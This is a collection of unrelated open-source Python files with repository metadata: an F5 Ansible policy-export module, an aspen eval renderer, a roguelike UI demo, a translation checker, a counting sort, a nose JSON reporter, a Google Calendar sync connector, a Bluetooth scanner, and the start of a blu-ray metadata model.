        """Emit any collected deprecation warnings via the Ansible module."""
        warnings = result.pop('__warnings', [])
        for warning in warnings:
            # BUGFIX: the original called self.client.module.deprecate();
            # F5RestClient has no 'module' attribute, so any deprecation
            # would have raised AttributeError.
            self.module.deprecate(
                msg=warning['msg'],
                version=warning['version']
            )

    def exec_module(self):
        """Entry point: validate provisioning, run the export, build the result."""
        if not module_provisioned(self.client, 'asm'):
            raise F5ModuleError(
                "ASM must be provisioned to use this module."
            )
        result = dict()
        self.export()
        reportable = ReportableChanges(params=self.changes.to_return())
        changes = reportable.to_return()
        result.update(**changes)
        # An export always produces (or overwrites) output, so report changed.
        result.update(dict(changed=True))
        return result

    def export(self):
        if self.exists():
            return self.update()
        else:
            return self.create()

    def update(self):
        """Destination file already exists; only overwrite when force=yes."""
        if not self.want.force:
            raise F5ModuleError(
                "File '{0}' already exists.".format(self.want.fulldest)
            )
        self.execute()

    def create(self):
        self._set_changed_options()
        if self.module.check_mode:
            return True
        if self.want.binary:
            self.export_binary()
            return True
        self.create_on_device()
        # Inline exports return the policy in the task result; nothing to download.
        if not self.want.inline:
            self.execute()
        return True

    def export_binary(self):
        self.export_binary_on_device()
        self.execute()
        return True

    def download(self):
        """Download the export file and verify it arrived on disk."""
        self.download_from_device(self.want.fulldest)
        if os.path.exists(self.want.fulldest):
            return True
        raise F5ModuleError(
            "Failed to download the remote file."
        )

    def execute(self):
        """Download the export file, then remove the temporary copy on the device."""
        self.download()
        self.remove_temp_policy_from_device()
        return True

    def exists(self):
        """True if the local destination file already exists (file exports only)."""
        if not self.want.inline:
            if os.path.exists(self.want.fulldest):
                return True
        return False

    def create_on_device(self):
        """Start the export-policy task on the device and wait for completion."""
        self._set_policy_link()
        params = self.changes.api_params()
        uri = "https://{0}:{1}/mgmt/tm/asm/tasks/export-policy/".format(
            self.client.provider['server'],
            self.client.provider['server_port'],
        )
        resp = self.client.api.post(uri, json=params)
        try:
            response = resp.json()
        except ValueError as ex:
            raise F5ModuleError(str(ex))
        if 'code' in response and response['code'] in [400, 403]:
            if 'message' in response:
                raise F5ModuleError(response['message'])
            else:
                raise F5ModuleError(resp.content)
        result, output = self.wait_for_task(response['id'])
        if result and output:
            if 'file' in output:
                self.changes.update(dict(inline_policy=output['file']))
        if result:
            return True

    def wait_for_task(self, task_id):
        """Poll the export task until it completes.

        @return: (bool, dict|None) success flag and, for inline exports,
                 the task result payload.
        """
        uri = "https://{0}:{1}/mgmt/tm/asm/tasks/export-policy/{2}".format(
            self.client.provider['server'],
            self.client.provider['server_port'],
            task_id
        )
        while True:
            resp = self.client.api.get(uri)
            try:
                response = resp.json()
            except ValueError as ex:
                raise F5ModuleError(str(ex))
            if 'code' in response and response['code'] == 400:
                if 'message' in response:
                    raise F5ModuleError(response['message'])
                else:
                    raise F5ModuleError(resp.content)
            if response['status'] in ['COMPLETED', 'FAILURE']:
                break
            time.sleep(1)
        if response['status'] == 'FAILURE':
            raise F5ModuleError(
                'Failed to export ASM policy.'
            )
        if response['status'] == 'COMPLETED':
            if not self.want.inline:
                return True, None
            else:
                return True, response['result']

    def _set_policy_link(self):
        """Resolve the policy selfLink on the device and store it in changes."""
        policy_link = None
        uri = 'https://{0}:{1}/mgmt/tm/asm/policies/'.format(
            self.client.provider['server'],
            self.client.provider['server_port'],
        )
        query = "?$filter=contains(name,'{0}')+and+contains(partition,'{1}')&$select=name,partition".format(
            self.want.name, self.want.partition
        )
        resp = self.client.api.get(uri + query)
        try:
            response = resp.json()
        except ValueError as ex:
            raise F5ModuleError(str(ex))
        if 'items' in response and response['items'] != []:
            policy_link = response['items'][0]['selfLink']
        if not policy_link:
            raise F5ModuleError("The policy was not found")
        self.changes.update(dict(policyReference={'link': policy_link}))
        return True

    def export_binary_on_device(self):
        """Run 'tmsh save asm policy ... bin-file' on the device via bash."""
        full_name = fq_name(self.want.partition, self.want.name)
        cmd = 'tmsh save asm policy {0} bin-file {1}'.format(full_name, self.want.file)
        uri = "https://{0}:{1}/mgmt/tm/util/bash/".format(
            self.client.provider['server'],
            self.client.provider['server_port'],
        )
        args = dict(
            command='run',
            utilCmdArgs='-c "{0}"'.format(cmd)
        )
        resp = self.client.api.post(uri, json=args)
        try:
            response = resp.json()
            if 'commandResult' in response:
                if 'Unexpected Error' in response['commandResult']:
                    raise F5ModuleError(response['commandResult'])
        except ValueError as ex:
            raise F5ModuleError(str(ex))
        if 'code' in response and response['code'] == 400:
            if 'message' in response:
                raise F5ModuleError(response['message'])
            else:
                raise F5ModuleError(resp.content)
        self._move_binary_to_download()
        return True

    def _move_binary_to_download(self):
        """Move the binary export into the REST download directory on the device."""
        name = '{0}~{1}'.format(self.client.provider['user'], self.want.file)
        move_path = '/var/tmp/{0} {1}/{2}'.format(
            self.want.file,
            '/ts/var/rest',
            name
        )
        params = dict(
            command='run',
            utilCmdArgs=move_path
        )
        uri = "https://{0}:{1}/mgmt/tm/util/unix-mv/".format(
            self.client.provider['server'],
            self.client.provider['server_port']
        )
        resp = self.client.api.post(uri, json=params)
        try:
            response = resp.json()
            if 'commandResult' in response:
                if 'cannot stat' in response['commandResult']:
                    raise F5ModuleError(response['commandResult'])
        except ValueError as ex:
            raise F5ModuleError(str(ex))
        if 'code' in response and response['code'] in [400, 403]:
            if 'message' in response:
                raise F5ModuleError(response['message'])
            else:
                raise F5ModuleError(resp.content)
        return True

    def download_from_device(self, dest):
        """Download the export file from the device to *dest*."""
        url = 'https://{0}:{1}/mgmt/tm/asm/file-transfer/downloads/{2}'.format(
            self.client.provider['server'],
            self.client.provider['server_port'],
            self.want.file
        )
        try:
            download_file(self.client, url, dest)
        except F5ModuleError:
            raise F5ModuleError(
                "Failed to download the file."
            )
        # BUGFIX: verify the actual downloaded file path; the original checked
        # self.want.dest (the destination directory), which is trivially True.
        if os.path.exists(dest):
            return True
        return False

    def remove_temp_policy_from_device(self):
        """Delete the temporary export file from the device's REST directory."""
        name = '{0}~{1}'.format(self.client.provider['user'], self.want.file)
        tpath_name = '/ts/var/rest/{0}'.format(name)
        uri = "https://{0}:{1}/mgmt/tm/util/unix-rm/".format(
            self.client.provider['server'],
            self.client.provider['server_port'],
        )
        args = dict(
            command='run',
            utilCmdArgs=tpath_name
        )
        resp = self.client.api.post(uri, json=args)
        try:
            response = resp.json()
        except ValueError as ex:
            raise F5ModuleError(str(ex))
        if 'code' in response and response['code'] == 400:
            if 'message' in response:
                raise F5ModuleError(response['message'])
            else:
                raise F5ModuleError(resp.content)
class ArgumentSpec(object):
    """Defines the Ansible argument spec and option exclusivity rules."""

    def __init__(self):
        self.supports_check_mode = True
        argument_spec = dict(
            name=dict(
                required=True,
            ),
            dest=dict(
                type='path'
            ),
            file=dict(),
            inline=dict(
                type='bool'
            ),
            compact=dict(
                type='bool'
            ),
            base64=dict(
                type='bool'
            ),
            binary=dict(
                type='bool'
            ),
            force=dict(
                default='yes',
                type='bool'
            ),
            partition=dict(
                default='Common',
                fallback=(env_fallback, ['F5_PARTITION'])
            )
        )
        self.argument_spec = {}
        # Merge the shared F5 connection options with the module-specific ones.
        self.argument_spec.update(f5_argument_spec)
        self.argument_spec.update(argument_spec)
        # Binary export excludes inline/compact; inline export excludes file/dest.
        self.mutually_exclusive = [
            ['binary', 'inline'],
            ['binary', 'compact'],
            ['dest', 'inline'],
            ['file', 'inline']
        ]
def main():
    """Module entry point: build the AnsibleModule, run the manager, exit."""
    spec = ArgumentSpec()
    module = AnsibleModule(
        argument_spec=spec.argument_spec,
        supports_check_mode=spec.supports_check_mode,
        mutually_exclusive=spec.mutually_exclusive,
    )

    client = F5RestClient(**module.params)

    try:
        mm = ModuleManager(module=module, client=client)
        results = mm.exec_module()
        # Always release the auth token, on success and failure alike.
        cleanup_tokens(client)
        exit_json(module, results, client)
    except F5ModuleError as ex:
        cleanup_tokens(client)
        fail_json(module, ex, client)
if __name__ == '__main__':
main()
| gregdek/ansible | lib/ansible/modules/network/f5/bigip_asm_policy_fetch.py | Python | gpl-3.0 | 21,007 |
from __future__ import absolute_import, division, print_function, unicode_literals
from aspen import renderers
class Renderer(renderers.Renderer):
    """Renderer that evaluates the page body as a single Python expression."""

    def render_content(self, context):
        # SECURITY NOTE: eval() executes arbitrary Python from the page body.
        # That is the whole point of this renderer, so page content must be
        # trusted (site-authored), never user-supplied.
        return eval(self.compiled, globals(), context)
class Factory(renderers.Factory):
    """Factory that registers the eval renderer with aspen."""
    Renderer = Renderer
| eXcomm/gratipay.com | gratipay/renderers/eval_.py | Python | cc0-1.0 | 303 |
"""
Demo6 GameState
"""
import RoguePy.State.GameState as GameState
from RoguePy.Input import Keys
from RoguePy.UI import Elements
from RoguePy.libtcod import libtcod
class Demo6(GameState):
  """Game state demonstrating the Dial UI element and mouse input handling."""

  def __init__(self, name, manager):
    # Use the explicit class in super() rather than self.__class__: the latter
    # recurses infinitely if this state is ever subclassed.
    super(Demo6, self).__init__(name, manager)

  def beforeLoad(self):
    """Build the UI and register input handlers before the state is shown."""
    self._setupView()
    self._setupInputs()

  def updateUi(self):
    """Refresh the label showing the dial's current value."""
    self.dialVal.clear()
    self.dialVal.setLabel(str(self.dial.getVal()))

  ###
  # Initialisation
  ###
  def _setupView(self):
    """Create the frame, labels and dial that make up this demo's view."""
    frame = Elements.Frame(0, 0, self.view.width, self.view.height)
    frame.setTitle("The Dial Element")
    self.view.addElement(frame)

    frame.addElement(Elements.Label(3, frame.height - 1, "ESC - Quit"))
    frame.addElement(Elements.Label(35, frame.height - 1, "Spc - Next"))

    self.dial = frame.addElement(Elements.Dial(1, 1))
    self.dialVal = frame.addElement(Elements.Label(1, 8, str(self.dial.getVal()), 7))

  def _setupInputs(self):
    """Wire keyboard shortcuts and mouse click handlers."""
    self.view.setKeyInputs({
      'quit': {
        'key': Keys.Escape,
        'ch': None,
        'fn': self.quit
      },
      'step': {
        'key': Keys.Space,
        'ch': None,
        'fn': self.next
      }
    })

    def leftClick(mouse):
      # Convert pixel coordinates to console cell coordinates.
      charSize = libtcod.sys_get_char_size()
      print("Left!")
      print("%s %s" % (mouse.x / charSize[0], mouse.y / charSize[1]))

    def rightClick(mouse):
      charSize = libtcod.sys_get_char_size()
      # BUGFIX: this handler previously printed "Left!" (copy-paste error).
      print("Right!")
      print("%s %s" % (mouse.x / charSize[0], mouse.y / charSize[1]))

    self.view.setMouseInputs({
      'rClick': rightClick,
      'lClick': leftClick
    })

    self.dial.setKeyInputs({
      'left': {
        'key': Keys.Left,
        'ch': None,
        'fn': self.ccw
      },
      'right': {
        'key': Keys.Right,
        'ch': None,
        'fn': self.cw
      }
    })

  ###
  # Input callbacks
  ###
  def next(self):
    self.manager.setNextState('demo1')

  def quit(self):
    self.manager.setNextState('quit')

  def cw(self):
    """Rotate the dial clockwise by one step (11.25 degrees)."""
    self.dial.add(11.25)
    self.updateUi()

  def ccw(self):
    """Rotate the dial counter-clockwise by one step (11.25 degrees)."""
    self.dial.sub(11.25)
    self.updateUi()
| v4nz666/7drl2017 | RoguePy/Demo/GameStates/Demo6.py | Python | gpl-3.0 | 2,409 |
#!/usr/bin/env python3
import nikola.nikola
import os.path
import glob
# Languages referenced by Nikola's TRANSLATIONS setting.
used = []
# Languages that actually have a messages_*.py file on disk.
exist = []

for tr in nikola.nikola.LEGAL_VALUES['TRANSLATIONS']:
    if isinstance(tr, tuple):
        # Tuple entries are language variants; record the bare code too.
        used.append(tr[0])
    used.append(tr)

for file in glob.glob(os.path.join('nikola', 'data', 'themes', 'base',
                                   'messages', 'messages_*.py')):
    # 'messages_xx.py' -> 'xx' (split at first '_', drop the '.py' suffix).
    lang = file.split('_', 1)[1][:-3]
    exist.append(lang)  # NOTE(review): collected but never read afterwards
    if lang in used:
        print('{0}: found'.format(lang))
    elif os.path.islink(file):
        # Symlinked message files are aliases; shown dimmed (grey).
        print('\x1b[1;1m\x1b[1;30m{0}: symlink\x1b[0m'.format(lang))
    else:
        # Red: message file exists but is not referenced by TRANSLATIONS.
        print('\x1b[1;1m\x1b[1;31m{0}: NOT found\x1b[0m'.format(lang))
# Part of Cosmos by OpenGenus Foundation
# Python program for counting sort
# The main function that sort the given string arr[] in
# alphabetical order
def countSort(arr):
    """Counting sort for a string of 8-bit characters.

    Returns the characters of ``arr`` as a list in ascending order.
    Runs in O(n + 256) time and O(n + 256) extra space.
    """
    # Output buffer sized to the input.  BUG FIX: the original sized it
    # to 256, which raises IndexError for inputs longer than 256 chars.
    output = [0 for _ in range(len(arr))]

    # count[c] = number of occurrences of character code c.
    count = [0 for _ in range(256)]

    # Result list (strings are immutable, so build a list of chars).
    ans = ["" for _ in arr]

    # Tally each character.
    for ch in arr:
        count[ord(ch)] += 1

    # Prefix sums: count[c] becomes the index one past the last slot for
    # character c.  BUG FIX: start at 1 -- the original started at 0 and
    # read count[-1] (the last element) into the first prefix sum.
    for i in range(1, 256):
        count[i] += count[i - 1]

    # Place each character into its slot.  Equal characters are
    # indistinguishable, so the forward iteration order is fine here.
    for i in range(len(arr)):
        output[count[ord(arr[i])] - 1] = arr[i]
        count[ord(arr[i])] -= 1

    # Copy the output array into the answer list.
    for i in range(len(arr)):
        ans[i] = output[i]
    return ans
# Driver program to test above function.  Guarded so importing this
# module for its countSort() no longer triggers the demo, and print()
# is used in the single-argument form that works on Python 2 and 3.
if __name__ == "__main__":
    arr = "opengenus"
    ans = countSort(arr)
    print("Sorted character array is %s" % "".join(ans))
| Jecoms/cosmos | code/sorting/counting_sort/countsort.py | Python | gpl-3.0 | 1,216 |
import logging
import os
import sys
import codecs
import json
from time import time
try:
from StringIO import StringIO
except ImportError:
from io import StringIO
from nose.plugins import Plugin
from nose.plugins.xunit import id_split, nice_classname, format_exception, exc_message, Tee
from nose.exc import SkipTest
from nose.pyversion import UNICODE_STRINGS
# Module logger following nose's 'nose.plugins.<name>' convention.
log = logging.getLogger('nose.plugins.lode_json_reporter')
class LodeJsonReporter(Plugin):
    """Nose plugin that collects per-test results and writes a JSON report.

    Mirrors the xunit plugin's behaviour (stdout/stderr are tee'd around
    every test, each test is timed) but serialises aggregate stats plus
    one record per test case to the file given by --lode-report.
    """

    name = 'lodejson'
    encoding = 'UTF-8'
    report_file = None

    def __init__(self):
        super(LodeJsonReporter, self).__init__()
        # Saved (stdout, stderr) pairs, one entry per nested capture context.
        self._capture_stack = []
        self._currentStdout = None
        self._currentStderr = None

    def options(self, parser, env=os.environ):
        """Sets additional command line options."""
        Plugin.options(self, parser, env)
        parser.add_option(
            '--lode-report', action='store',
            dest='lode_report', metavar="FILE",
            default=env.get('LODE_REPORT_FILE', 'lode-report.json'),
            help=("Path to xml file to store the lode report in. "
                  "Default is lode-report.xml in the working directory "
                  "[LODE_REPORT_FILE]"))

    def configure(self, options, config):
        """Reset counters and open the report file when the plugin is enabled."""
        super(LodeJsonReporter, self).configure(options, config)
        self.config = config
        if self.enabled:
            self.stats = {
                'errors': 0,
                'failures': 0,
                'passes': 0,
                'skipped': 0
            }
            self.testcases = []
            # 'replace' keeps report writing alive on undecodable output.
            self.report_file = codecs.open(
                options.lode_report, 'w', self.encoding, 'replace'
            )

    def _timeTaken(self):
        # Elapsed seconds since beforeTest(); 0.0 if the test never started.
        if hasattr(self, '_timer'):
            taken = time() - self._timer
        else:
            # test died before it ran (probably error in setup())
            # or success/failure added before test started probably
            # due to custom TestResult munging
            taken = 0.0
        return taken

    def report(self, stream):
        """Write accumulated stats and test cases as a single JSON document."""
        self.stats['total'] = (self.stats['errors'] + self.stats['failures']
                               + self.stats['passes'] + self.stats['skipped'])
        report = dict()
        report['encoding'] = self.encoding
        report['stats'] = self.stats
        report['testcases'] = [testcase for testcase in self.testcases]
        self.report_file.write(json.dumps(report))
        self.report_file.close()

    def _startCapture(self):
        # Push the real streams, then tee further output so it is both
        # displayed live and recorded for the report.
        self._capture_stack.append((sys.stdout, sys.stderr))
        self._currentStdout = StringIO()
        self._currentStderr = StringIO()
        sys.stdout = Tee(self._currentStdout, sys.stdout)
        sys.stderr = Tee(self._currentStderr, sys.stderr)

    def startContext(self, context):
        self._startCapture()

    def beforeTest(self, test):
        # Per-test action list, filled by the test machinery elsewhere.
        test.test_actions = list()
        self._timer = time()
        self._startCapture()

    def _endCapture(self):
        # Restore the previously saved stream pair, if any.
        if self._capture_stack:
            sys.stdout, sys.stderr = self._capture_stack.pop()

    def afterTest(self, test):
        self._endCapture()
        self._currentStdout = None
        self._currentStderr = None

    def finalize(self, test):
        # Unwind any capture contexts still open (e.g. after errors).
        while self._capture_stack:
            self._endCapture()

    def _getCapturedStdout(self):
        if self._currentStdout:
            value = self._currentStdout.getvalue()
            if value:
                return value
        return ''

    def _getCapturedStderr(self):
        if self._currentStderr:
            value = self._currentStderr.getvalue()
            if value:
                return value
        return ''

    def form_test_report(self, test, err=None, status=None):
        """Append one serialisable record for *test* to self.testcases."""
        # NOTE(review): these locals shadow the imported time() and the
        # builtin id() within this method.
        time = self._timeTaken()
        id = test.id()
        actions = test.test_actions
        priority = test.priority
        if not status:
            status = 'success'
        report = {
            'classname': id_split(id)[0],
            'name': id_split(id)[-1],
            'actions': actions,
            'time': time,
            'status': status,
            'priority': priority,
            'systemout': self._getCapturedStdout(),
            'systemerr': self._getCapturedStderr(),
        }
        if err:
            report['error'] = {
                'type': nice_classname(err[0]),
                'message': exc_message(err),
                'tb': format_exception(err),
            }
        self.testcases.append(report)

    def addError(self, test, err, capt=None):
        # SkipTest arrives through the error channel; count it as a skip.
        if issubclass(err[0], SkipTest):
            status = 'skipped'
            self.stats['skipped'] += 1
        else:
            status = 'error'
            self.stats['errors'] += 1
        self.form_test_report(test, err, status)

    def addFailure(self, test, err, capt=None, tb_info=None):
        self.stats['failures'] += 1
        status = 'fail'
        self.form_test_report(test, err, status)

    def addSuccess(self, test, capt=None):
        self.stats['passes'] += 1
        self.form_test_report(test)

    def _forceUnicode(self, s):
        # Python 2 only: decode byte strings so JSON serialisation works.
        if not UNICODE_STRINGS:
            if isinstance(s, str):
                s = s.decode(self.encoding, 'replace')
        return s
from __future__ import unicode_literals
import frappe
from frappe.data_migration.doctype.data_migration_connector.connectors.base import BaseConnection
import googleapiclient.discovery
import google.oauth2.credentials
from googleapiclient.errors import HttpError
import time
from datetime import datetime
from frappe.utils import add_days, add_years
class CalendarConnector(BaseConnection):
    """Frappe data-migration connector syncing Events with Google Calendar.

    Wraps the Google Calendar v3 API for one 'GCalendar Account' and
    implements the BaseConnection get/insert/update/delete contract.
    """

    def __init__(self, connector):
        self.connector = connector
        settings = frappe.get_doc("GCalendar Settings", None)
        self.account = frappe.get_doc("GCalendar Account", connector.username)
        # OAuth2 material assembled from the account and global settings.
        self.credentials_dict = {
            'token': self.account.get_password(fieldname='session_token', raise_exception=False),
            'refresh_token': self.account.get_password(fieldname='refresh_token', raise_exception=False),
            'token_uri': 'https://www.googleapis.com/oauth2/v4/token',
            'client_id': settings.client_id,
            'client_secret': settings.get_password(fieldname='client_secret', raise_exception=False),
            'scopes':'https://www.googleapis.com/auth/calendar'
        }
        # Remote primary-key field used by the migration framework.
        self.name_field = 'id'
        self.credentials = google.oauth2.credentials.Credentials(**self.credentials_dict)
        self.gcalendar = googleapiclient.discovery.build('calendar', 'v3', credentials=self.credentials)
        self.check_remote_calendar()

    def check_remote_calendar(self):
        """Ensure the remote calendar exists, creating it when missing."""
        def _create_calendar():
            # Create the calendar in the site's timezone, store its id locally.
            timezone = frappe.db.get_value("System Settings", None, "time_zone")
            calendar = {
                'summary': self.account.calendar_name,
                'timeZone': timezone
            }
            try:
                created_calendar = self.gcalendar.calendars().insert(body=calendar).execute()
                frappe.db.set_value("GCalendar Account", self.account.name, "gcalendar_id", created_calendar["id"])
            except Exception:
                frappe.log_error(frappe.get_traceback())
        try:
            if self.account.gcalendar_id is not None:
                try:
                    self.gcalendar.calendars().get(calendarId=self.account.gcalendar_id).execute()
                except Exception:
                    # NOTE(review): this broad handler catches HttpError
                    # too, so the outer HttpError branch below is likely
                    # unreachable for the get() call -- confirm intent.
                    frappe.log_error(frappe.get_traceback())
            else:
                _create_calendar()
        except HttpError as err:
            if err.resp.status in [403, 500, 503]:
                # Rate limit / server error: back off briefly.
                time.sleep(5)
            elif err.resp.status in [404]:
                _create_calendar()
            else: raise

    def get(self, remote_objectname, fields=None, filters=None, start=0, page_length=10):
        # Only event listing is supported remotely.
        return self.get_events(remote_objectname, filters, page_length)

    def insert(self, doctype, doc):
        """Push a new local Event to Google; past events are skipped."""
        if doctype == 'Events':
            from frappe.desk.doctype.event.event import has_permission
            d = frappe.get_doc("Event", doc["name"])
            if has_permission(d, self.account.name):
                if doc["start_datetime"] >= datetime.now():
                    try:
                        doctype = "Event"
                        e = self.insert_events(doctype, doc)
                        return e
                    except Exception:
                        frappe.log_error(frappe.get_traceback(), "GCalendar Synchronization Error")

    def update(self, doctype, doc, migration_id):
        """Update the remote copy of an Event identified by *migration_id*."""
        if doctype == 'Events':
            from frappe.desk.doctype.event.event import has_permission
            d = frappe.get_doc("Event", doc["name"])
            if has_permission(d, self.account.name):
                if doc["start_datetime"] >= datetime.now() and migration_id is not None:
                    try:
                        doctype = "Event"
                        return self.update_events(doctype, doc, migration_id)
                    except Exception:
                        frappe.log_error(frappe.get_traceback(), "GCalendar Synchronization Error")

    def delete(self, doctype, migration_id):
        """Delete the remote event identified by *migration_id*."""
        if doctype == 'Events':
            try:
                return self.delete_events(migration_id)
            except Exception:
                frappe.log_error(frappe.get_traceback(), "GCalendar Synchronization Error")

    def get_events(self, remote_objectname, filters, page_length):
        """Fetch remote events, using the stored incremental sync token."""
        page_token = None
        results = []
        events = {"items": []}
        while True:
            try:
                events = self.gcalendar.events().list(calendarId=self.account.gcalendar_id, maxResults=page_length,
                    singleEvents=False, showDeleted=True, syncToken=self.account.next_sync_token or None).execute()
            except HttpError as err:
                if err.resp.status in [410]:
                    # 410 Gone: sync token expired -> full fetch of the
                    # last year instead.
                    events = self.gcalendar.events().list(calendarId=self.account.gcalendar_id, maxResults=page_length,
                        singleEvents=False, showDeleted=True, timeMin=add_years(None, -1).strftime('%Y-%m-%dT%H:%M:%SZ')).execute()
                else:
                    frappe.log_error(err.resp, "GCalendar Events Fetch Error")
            for event in events['items']:
                # Tag every event with its local account and calendar tz.
                event.update({'account': self.account.name})
                event.update({'calendar_tz': events['timeZone']})
                results.append(event)
            page_token = events.get('nextPageToken')
            if not page_token:
                # Persist the token so the next run is incremental.
                if events.get('nextSyncToken'):
                    frappe.db.set_value("GCalendar Account", self.connector.username, "next_sync_token", events.get('nextSyncToken'))
                break
            # NOTE(review): page_token is read but never passed back to
            # list(), so pages after the first repeat the same request --
            # TODO confirm pagination actually advances.
        return list(results)

    def insert_events(self, doctype, doc, migration_id=None):
        """Create one remote event from a local doc; returns its remote id."""
        event = {
            'summary': doc.summary,
            'description': doc.description
        }
        dates = self.return_dates(doc)
        event.update(dates)
        if migration_id:
            event.update({"id": migration_id})
        if doc.repeat_this_event != 0:
            recurrence = self.return_recurrence(doctype, doc)
            # 'not not' == plain truthiness test (non-empty string).
            if not not recurrence:
                event.update({"recurrence": ["RRULE:" + str(recurrence)]})
        try:
            remote_event = self.gcalendar.events().insert(calendarId=self.account.gcalendar_id, body=event).execute()
            return {self.name_field: remote_event["id"]}
        except Exception:
            frappe.log_error(frappe.get_traceback(), "GCalendar Synchronization Error")

    def update_events(self, doctype, doc, migration_id):
        """Update a remote event in place; falls back to insert on 404."""
        try:
            event = self.gcalendar.events().get(calendarId=self.account.gcalendar_id, eventId=migration_id).execute()
            # NOTE(review): the fetched event is immediately discarded and
            # rebuilt from scratch below -- remote-only fields are lost.
            event = {
                'summary': doc.summary,
                'description': doc.description
            }
            if doc.event_type == "Cancel":
                event.update({"status": "cancelled"})
            dates = self.return_dates(doc)
            event.update(dates)
            if doc.repeat_this_event != 0:
                recurrence = self.return_recurrence(doctype, doc)
                if recurrence:
                    event.update({"recurrence": ["RRULE:" + str(recurrence)]})
            try:
                updated_event = self.gcalendar.events().update(calendarId=self.account.gcalendar_id, eventId=migration_id, body=event).execute()
                return {self.name_field: updated_event["id"]}
            except Exception as e:
                frappe.log_error(e, "GCalendar Synchronization Error")
        except HttpError as err:
            if err.resp.status in [404]:
                # Remote copy vanished: recreate it with the same id.
                self.insert_events(doctype, doc, migration_id)
            else:
                frappe.log_error(err.resp, "GCalendar Synchronization Error")

    def delete_events(self, migration_id):
        """Delete a remote event; 410 (already gone) is ignored."""
        try:
            self.gcalendar.events().delete(calendarId=self.account.gcalendar_id, eventId=migration_id).execute()
        except HttpError as err:
            if err.resp.status in [410]:
                pass

    def return_dates(self, doc):
        """Build the Google 'start'/'end' payload for a local doc.

        All-day events use date-only values with an exclusive end date
        (hence the add_days(+1)); timed events use full datetimes.
        """
        timezone = frappe.db.get_value("System Settings", None, "time_zone")
        if doc.end_datetime is None:
            doc.end_datetime = doc.start_datetime
        if doc.all_day == 1:
            return {
                'start': {
                    'date': doc.start_datetime.date().isoformat(),
                    'timeZone': timezone,
                },
                'end': {
                    'date': add_days(doc.end_datetime.date(), 1).isoformat(),
                    'timeZone': timezone,
                }
            }
        else:
            return {
                'start': {
                    'dateTime': doc.start_datetime.isoformat(),
                    'timeZone': timezone,
                },
                'end': {
                    'dateTime': doc.end_datetime.isoformat(),
                    'timeZone': timezone,
                }
            }

    def return_recurrence(self, doctype, doc):
        """Translate the doc's repeat settings into an RRULE body string.

        Returns None for unsupported repeat modes; the caller prefixes
        'RRULE:' itself.
        """
        e = frappe.get_doc(doctype, doc.name)
        if e.repeat_till is not None:
            end_date = datetime.combine(e.repeat_till, datetime.min.time()).strftime('UNTIL=%Y%m%dT%H%M%SZ')
        else:
            end_date = None
        day = []
        if e.repeat_on == "Every Day":
            # NOTE(review): weekday flags are tested with 'is not None',
            # not truthiness -- if they are 0/1 ints every day always
            # matches; confirm the field type.
            if e.monday is not None:
                day.append("MO")
            if e.tuesday is not None:
                day.append("TU")
            if e.wednesday is not None:
                day.append("WE")
            if e.thursday is not None:
                day.append("TH")
            if e.friday is not None:
                day.append("FR")
            if e.saturday is not None:
                day.append("SA")
            if e.sunday is not None:
                day.append("SU")
            day = "BYDAY=" + ",".join(str(d) for d in day)
            frequency = "FREQ=DAILY"
        elif e.repeat_on == "Every Week":
            frequency = "FREQ=WEEKLY"
        elif e.repeat_on == "Every Month":
            frequency = "FREQ=MONTHLY;BYDAY=SU,MO,TU,WE,TH,FR,SA;BYSETPOS=-1"
            end_date = datetime.combine(add_days(e.repeat_till, 1), datetime.min.time()).strftime('UNTIL=%Y%m%dT%H%M%SZ')
        elif e.repeat_on == "Every Year":
            frequency = "FREQ=YEARLY"
        else:
            return None
        wst = "WKST=SU"
        # Join the populated parts; 'day' stays an empty list for
        # non-daily frequencies and is filtered out by the 'not not' test.
        elements = [frequency, end_date, wst, day]
        return ";".join(str(e) for e in elements if e is not None and not not e)
| ESS-LLP/frappe | frappe/data_migration/doctype/data_migration_connector/connectors/calendar_connector.py | Python | mit | 8,438 |
from bluetooth import *
# Scan for nearby discoverable Bluetooth devices (blocking inquiry).
nearby_devices = discover_devices()

for device in nearby_devices:
    # lookup_name() issues a remote name request per discovered address.
    print("%s - %s" % (lookup_name(device), device))
| zach-king/Python-Miscellaneous | Bluetooth/showdevices.py | Python | gpl-2.0 | 145 |
from . import sheet_geometry
| CellModels/tyssue | tyssue/geometry/__init__.py | Python | gpl-2.0 | 29 |
# proxy module
from __future__ import absolute_import
from apptools.appscripting.package_globals import *
| enthought/etsproxy | enthought/appscripting/package_globals.py | Python | bsd-3-clause | 106 |
from __future__ import unicode_literals, division, absolute_import
from builtins import * # noqa pylint: disable=unused-import, redefined-builtin
import logging
from datetime import datetime, timedelta
import time
from sqlalchemy import Table, Column, Integer, Float, Unicode, DateTime, Date, func
from sqlalchemy.ext.associationproxy import association_proxy
from sqlalchemy.schema import ForeignKey
from sqlalchemy.orm import relation
from dateutil.parser import parse as dateutil_parse
from flexget import db_schema, plugin
from flexget.utils.soup import get_soup
from flexget.event import event
from flexget.utils import requests
from flexget.utils.database import year_property
log = logging.getLogger('api_bluray')
Base = db_schema.versioned_base('api_bluray', 0)

# association tables
# Many-to-many link between bluray_movies and bluray_genres.
genres_table = Table('bluray_movie_genres', Base.metadata,
                     Column('movie_id', Integer, ForeignKey('bluray_movies.id')),
                     # NOTE(review): declared Integer but references the
                     # Unicode primary key bluray_genres.name -- type
                     # mismatch, confirm against the live schema.
                     Column('genre_name', Integer, ForeignKey('bluray_genres.name')))
Base.register_table(genres_table)

BASE_URL = 'http://m.blu-ray.com/'
def bluray_request(endpoint, **params):
    """Issue a GET against blu-ray.com and decode the JSON response.

    ``endpoint`` is appended to BASE_URL; keyword arguments become the
    query string.  ``strict=False`` tolerates control characters that
    the site sometimes embeds in its JSON.
    """
    response = requests.get(BASE_URL + endpoint, params=params)
    return response.json(strict=False)
def extract_release_date(release_date):
    """Parse a blu-ray.com release-date string into a ``datetime.date``.

    Empty/None values and the literal 'No release date' fall back to
    Dec 31 of the current year, so unreleased titles sort after
    everything already released.
    """
    if release_date and release_date.lower() != 'no release date':
        return dateutil_parse(release_date).date()
    fallback = 'Dec 31, %s' % datetime.now().year
    return dateutil_parse(fallback).date()
class BlurayMovie(Base):
    """ORM entity for one movie, populated by scraping m.blu-ray.com."""

    __tablename__ = 'bluray_movies'

    id = Column(Integer, primary_key=True, autoincrement=False, nullable=False)
    name = Column(Unicode)
    url = Column(Unicode)
    release_date = Column(Date)
    year = year_property('release_date')
    runtime = Column(Integer)
    overview = Column(Unicode)
    country = Column(Unicode)
    studio = Column(Unicode)
    rating = Column(Float)
    bluray_rating = Column(Integer)
    certification = Column(Unicode)
    _genres = relation('BlurayGenre', secondary=genres_table, backref='movies')
